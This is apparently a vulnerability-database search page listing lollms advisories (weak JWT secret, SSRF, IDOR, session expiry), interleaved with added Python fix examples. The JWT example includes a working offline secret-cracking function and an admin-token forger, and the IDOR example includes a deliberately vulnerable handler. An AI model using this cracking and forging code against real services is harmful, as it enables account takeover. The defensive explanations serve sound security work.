Lucene search
568 matches found

Cvelist (added 2026/04/08)

CVE-2026-1163 Insufficient Session Expiration in parisneo/lollms

An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject reques...

CVSS 4.1, EPSS 0.0021
Exploits 0, References 1
EUVD (added 2026/04/08)

EUVD-2026-20030

An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject reques...

CVSS 4.1, AI score 5.9, EPSS 0.0021
Exploits 0, References 1
Vulnrichment (added 2026/04/08)

CVE-2026-1163 Insufficient Session Expiration in parisneo/lollms

An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject reques...

CVSS 4.1, AI score 5.9, EPSS 0.0021
Exploits 0, References 1
CVE (added 2026/04/08)

CVE-2026-1163

CVE-2026-1163 describes an insufficient session expiration in the latest version of parisneo/lollms, where active sessions are not invalidated after a password reset due to missing logic to reject idle requests and a default 31-day session duration. This enables a compromised account to retain ac...

CVSS 4.1, AI score 5.9, EPSS 0.0021
Exploits 0, References 1
Positive Technologies (added 2026/04/08)

PT-2026-31070

An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject reques...

CVSS 4.1, AI score 5.9, EPSS 0.0021
Exploits 0, References 2
CNNVD (added 2026/04/08)

LoLLMs code issue vulnerability

LoLLMs is a large language and multimodal system developed by Saifeddine ALOUI as a personal project. LoLLMs has a code vulnerability stemming from an insufficient session expiration mechanism after password reset, which may allow attackers to maintain persistent access to compromise...

CVSS 4.1, AI score 5.9, EPSS 0.0021
Exploits 0, References 1
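The entries above all describe the same defect: a password reset does not kill existing sessions, and there is no idle check, only a long absolute lifetime. The following is an added illustration of the server-side fix, not code from lollms: a session table where each session records the user's password generation at issue time, a reset bumps that generation and drops the user's sessions, and authentication rejects idle and over-age tokens. The class and field names (SessionStore, password_generation) are assumptions made for this example; the sha256 password hash is a stand-in for a real KDF.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class User:
    username: str
    password_hash: str
    # Incremented on every password change. Sessions remember the value they
    # were issued under; a mismatch means "issued before the last reset".
    password_generation: int = 0


@dataclass
class Session:
    user: str
    generation: int
    issued_at: float
    last_seen: float


def _hash_password(password: str) -> str:
    # sha256 keeps the example dependency-free; production code should use a
    # slow KDF (argon2id, scrypt or bcrypt) instead.
    return hashlib.sha256(password.encode()).hexdigest()


class SessionStore:
    """Server-side session table with idle timeout, absolute lifetime and
    reset-invalidation. Times are epoch seconds; `now` is injectable so the
    behaviour can be checked without sleeping."""

    def __init__(self, idle_timeout: float = 30 * 60, max_age: float = 24 * 3600):
        self.idle_timeout = idle_timeout
        self.max_age = max_age
        self.users: Dict[str, User] = {}
        self.sessions: Dict[str, Session] = {}

    def add_user(self, username: str, password: str) -> None:
        self.users[username] = User(username, _hash_password(password))

    def login(self, username: str, password: str, now: Optional[float] = None) -> Optional[str]:
        now = time.time() if now is None else now
        user = self.users.get(username)
        if user is None or not hmac.compare_digest(user.password_hash, _hash_password(password)):
            return None
        token = secrets.token_urlsafe(32)  # 256 bits of randomness, unguessable
        self.sessions[token] = Session(username, user.password_generation, now, now)
        return token

    def reset_password(self, username: str, new_password: str) -> None:
        user = self.users[username]
        user.password_hash = _hash_password(new_password)
        user.password_generation += 1
        # Invalidate every session of this user, not only the one making the call.
        for token in [t for t, s in self.sessions.items() if s.user == username]:
            del self.sessions[token]

    def authenticate(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Return the username for a live session, or None. Any failure removes
        the session so the token cannot be retried later."""
        now = time.time() if now is None else now
        sess = self.sessions.get(token)
        if sess is None:
            return None
        user = self.users.get(sess.user)
        expired = (
            user is None
            or sess.generation != user.password_generation  # pre-reset session that escaped deletion
            or now - sess.last_seen > self.idle_timeout      # idle too long
            or now - sess.issued_at > self.max_age           # absolute lifetime
        )
        if expired:
            del self.sessions[token]
            return None
        sess.last_seen = now
        return sess.user
```

The generation check is deliberately redundant with the deletion in reset_password: if sessions live in a cache or replica that the reset did not reach, a token issued before the reset still fails. The same generation counter should be consulted for stateless tokens (JWT claims) that cannot be deleted at all.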
NVD (added 2026/04/07)

CVE-2026-1114

In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the...

CVSS 9.8, EPSS 0.0054
Exploits 1, References 2
Cvelist (added 2026/04/07)

CVE-2026-1114 Improper Access Control via Weak JWT Token in parisneo/lollms

In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the...

CVSS 9.8, EPSS 0.0054
Exploits 1, References 2
ATTACKERKB (added 2026/04/07)

CVE-2026-1114

In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the...

CVSS 9.8, AI score 7.2, EPSS 0.0054
Exploits 1, References 3
CNNVD (added 2026/04/07)

LoLLMs security vulnerability

LoLLMs is a large language and multimodal system developed by Saifeddine ALOUI as a personal project. Version 2.1.0 of LoLLMs contains a security vulnerability. It arises from the use of a weak key for signing JSON Web Tokens, leading to improper access control. This could allow attackers to...

CVSS 9.8, AI score 7.3, EPSS 0.0054
Exploits 1, References 2
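What "offline brute force" of an HS256 secret means in practice, as an added example rather than anything taken from lollms or its advisory: a captured token is the only input, each guess costs one HMAC and never touches the server, and a recovered key lets the attacker mint a token for any subject and role. The minimal encoder and verifier below use only the standard library and produce the same wire format as PyJWT; COMMON_SECRETS is a constructed stand-in for the wordlists a real attacker would use, and the secret value "secret" is chosen purely for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional

# Constructed wordlist standing in for real dictionaries (rockyou, default-secret
# lists, strings scraped from the target's repository and docs).
COMMON_SECRETS = ["secret", "changeme", "password", "lollms", "jwt_secret", "supersecret", "admin"]


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_encode(payload: dict, secret: str) -> str:
    """Minimal HS256 JWT: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [_b64url(json.dumps(obj, separators=(",", ":")).encode()) for obj in (header, payload)]
    signing_input = ".".join(parts).encode("ascii")
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return ".".join(parts + [_b64url(sig)])


def jwt_verify(token: str, secret: str) -> Optional[dict]:
    """Return the payload if the signature checks out, else None. The algorithm
    is pinned server-side; the token header is never allowed to pick it."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        return None
    return json.loads(_b64url_decode(p))


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: one HMAC per candidate against a captured token.
    No request reaches the server, so rate limits and logs never see it."""
    h, p, s = token.split(".")
    signing_input = f"{h}.{p}".encode("ascii")
    target = _b64url_decode(s)
    for cand in candidates:
        if hmac.compare_digest(hmac.new(cand.encode(), signing_input, hashlib.sha256).digest(), target):
            return cand
    return None


def forge_admin_token(captured_token: str, candidates: Iterable[str]) -> Optional[str]:
    """Post-exploitation step: with the key recovered, sign an arbitrary payload."""
    key = crack_hs256(captured_token, candidates)
    if key is None:
        return None
    return jwt_encode({"sub": "admin", "role": "admin"}, key)


def generate_secret() -> str:
    """384 random bits, base64url-encoded: the kind of value SECRET_KEY should hold."""
    return secrets.token_urlsafe(48)


def secret_is_acceptable(secret: str) -> bool:
    """RFC 7518 section 3.2 requires an HS256 key of at least 256 bits; a
    dictionary word padded to that length is still a dictionary word."""
    return len(secret.encode()) >= 32 and secret not in COMMON_SECRETS
```

A secret that survives crack_hs256 against a wordlist is not automatically fine: hashcat mode 16500 runs the same computation at billions of guesses per second on a GPU, so the only defence is a key with real entropy, loaded from the environment or a secrets manager rather than a hard-coded default, and rotated if it was ever checked in.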
Packet Storm (added 2026/03/31)

lollms-webui Server-Side Request Forgery

A critical server-side request forgery vulnerability has been identified in lollms-webui, the web interface for Lord of Large Language and Multi modal Systems. The @router.post("/api/proxy") endpoint allows unauthenticated attackers to force the server into making arbitrary GET requests. This can b...

CVSS 9.1, AI score 5.8, EPSS 0.21629
Exploits 3
RedhatCVE (added 2026/03/30)

CVE-2026-0560

A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0, specifically in the /api/files/export-content endpoint. The download_image_to_temp function in backend/routers/files.py fails to validate user-controlled URLs, allowing attackers to make arbitrary HTT...

CVSS 7.5, AI score 7.4, EPSS 0.01765
Exploits 1, References 1
RedhatCVE (added 2026/03/30)

CVE-2026-0562

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respond_request function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

CVSS 8.3, AI score 7, EPSS 0.00268
Exploits 1, References 1
RedhatCVE (added 2026/03/30)

CVE-2026-0558

A vulnerability in parisneo/lollms, up to and including version 2.2.0, allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. This endpoint does not enforce authentication, unlike other file-related endpoints, and lacks the Depends(get_current_active_us...

CVSS 9.8, AI score 7, EPSS 0.0043
Exploits 1, References 1
EUVD (added 2026/03/29)

EUVD-2026-17039

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respond_request function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

CVSS 8.3, AI score 7, EPSS 0.00268
Exploits 1, References 3
EUVD (added 2026/03/29)

EUVD-2026-17037

A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0, specifically in the /api/files/export-content endpoint. The download_image_to_temp function in backend/routers/files.py fails to validate user-controlled URLs, allowing attackers to make arbitrary HTT...

CVSS 7.5, AI score 7.4, EPSS 0.01765
Exploits 1, References 3
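Both SSRF entries on this page (the unauthenticated /api/proxy endpoint from the Packet Storm advisory and the /api/files/export-content download in CVE-2026-0560) have the same root cause: a user-supplied URL is fetched without any policy on where it may point. The following is an added example of such a policy, not lollms code: it pins the scheme, rejects credentials in the URL, resolves the host, and refuses anything that lands on loopback, private, link-local (including the 169.254.169.254 cloud metadata address), multicast or unspecified ranges, with IPv4-mapped IPv6 unwrapped first. The resolver is injected so the check runs offline here; FAKE_DNS and its hostnames are constructed for the demonstration.

```python
import ipaddress
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    blocked = (addr.is_private or addr.is_loopback or addr.is_link_local
               or addr.is_multicast or addr.is_reserved or addr.is_unspecified)
    return not blocked and addr.is_global


def validate_outbound_url(url: str, resolve: Callable[[str], List[str]]) -> Tuple[bool, str, List[str]]:
    """Decide whether a user-supplied URL may be fetched.

    `resolve` maps a hostname to its IP strings. It is injected so the policy is
    testable offline and so the caller can connect to exactly the addresses
    that were checked, closing the DNS-rebinding window between check and
    fetch. Returns (allowed, reason, pinned_ips)."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
        parts.port  # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"malformed url: {exc}", []
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", []
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in url", []
    if not host:
        return False, "missing host", []
    try:
        ips = [str(ipaddress.ip_address(host))]  # literal IPv4 / bracketed IPv6 host
    except ValueError:
        # Names, and odd forms such as decimal or octal IPs that getaddrinfo
        # would happily turn into 127.0.0.1, all go through the resolver.
        ips = list(resolve(host))
    if not ips:
        return False, f"{host} does not resolve", []
    for ip in ips:
        try:
            ok = is_public_address(ip)
        except ValueError:
            ok = False
        if not ok:
            return False, f"{host} -> {ip} is not a public address", []
    return True, "ok", ips


# Constructed DNS table for the offline demonstration. A real deployment calls
# socket.getaddrinfo here and still connects only to the returned addresses.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "intranet.corp": ["10.0.0.5"],
    "metadata.evil": ["169.254.169.254"],
    "rebind.evil": ["93.184.216.34", "127.0.0.1"],
}


def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS.get(host.lower(), [])
```

Two things the validator cannot do on its own: it must be re-run on every redirect hop (fetch with redirects disabled and follow them manually), and the HTTP client must actually connect to one of the pinned IPs with the original hostname in the Host/SNI fields, otherwise a second lookup at connect time reopens the rebinding race. An allowlist of permitted destination hosts is simpler still where the feature allows it.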
EUVD (added 2026/03/29)

EUVD-2026-17035

A vulnerability in parisneo/lollms, up to and including version 2.2.0, allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. This endpoint does not enforce authentication, unlike other file-related endpoints, and lacks the Depends(get_current_active_us...

CVSS 7.5, AI score 7, EPSS 0.0043
Exploits 1, References 3
NVD (added 2026/03/29)

CVE-2026-0562

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respond_request function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

CVSS 8.3, EPSS 0.00268
Exploits 1, References 3
PyPA (added 2026/03/29)

PYSEC-2026-204

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respond_request function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

CVSS 8.3, AI score 7.3, EPSS 0.00268
Exploits 1, References 3, Affected Software 1
PyPA (added 2026/03/29)

PYSEC-0000-CVE-2026-0562

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respond_request function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

CVSS 8.3, AI score 7.3, EPSS 0.00268
Exploits 1, References 3, Affected Software 1
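The several CVE-2026-0562 entries above describe the textbook IDOR shape: the handler is authenticated, fetches the friend request by the id the client supplied, and never compares the row's recipient with the caller. The following is an added illustration of the vulnerable pattern beside the fix, written against an in-memory dict rather than lollms' real models, so the function names, the fixture in make_db and the exception types are all assumptions for this example.

```python
from dataclasses import dataclass
from typing import Dict


@dataclass
class FriendRequest:
    id: int
    sender_id: int
    receiver_id: int
    status: str = "pending"


class NotFound(Exception):
    """Maps to HTTP 404."""


class Conflict(Exception):
    """Maps to HTTP 409: the request was already answered."""


def make_db() -> Dict[int, FriendRequest]:
    # Constructed fixture: user 1 asked user 2, user 4 asked user 3.
    return {
        1: FriendRequest(id=1, sender_id=1, receiver_id=2),
        2: FriendRequest(id=2, sender_id=4, receiver_id=3),
    }


def respond_request_vulnerable(db, request_id: int, action: str, current_user_id: int) -> FriendRequest:
    """The IDOR pattern: the row is fetched by id alone, and current_user_id,
    although authenticated, is never compared with the row's receiver."""
    req = db[request_id]
    req.status = "accepted" if action == "accept" else "rejected"
    return req


def respond_request_fixed(db, request_id: int, action: str, current_user_id: int) -> FriendRequest:
    if action not in ("accept", "reject"):
        raise ValueError("action must be accept or reject")
    req = db.get(request_id)
    # Authorization is part of the lookup: a request not addressed to the caller
    # is treated exactly like a missing one, so the response does not reveal
    # whether the id exists. With an ORM this is the same as
    # query.filter(id == request_id, receiver_id == current_user_id).
    if req is None or req.receiver_id != current_user_id:
        raise NotFound(f"friend request {request_id} not found")
    if req.status != "pending":
        raise Conflict(f"friend request {request_id} already {req.status}")
    req.status = "accepted" if action == "accept" else "rejected"
    return req


def try_respond(db, request_id: int, action: str, current_user_id: int) -> str:
    """Turn the fixed handler's outcome into the status an HTTP layer would
    map to 200 / 404 / 409, so callers see one value per case."""
    try:
        return respond_request_fixed(db, request_id, action, current_user_id).status
    except NotFound:
        return "not_found"
    except Conflict:
        return "conflict"
```

The state check matters as much as the ownership check: without it the legitimate recipient can flip an answered request back and forth, and an attacker who obtains any foothold on the account can replay an accept after a reject. Scoping the query by receiver_id rather than checking after the fetch also keeps the rule in one place when new endpoints (cancel, list, notify) are added later.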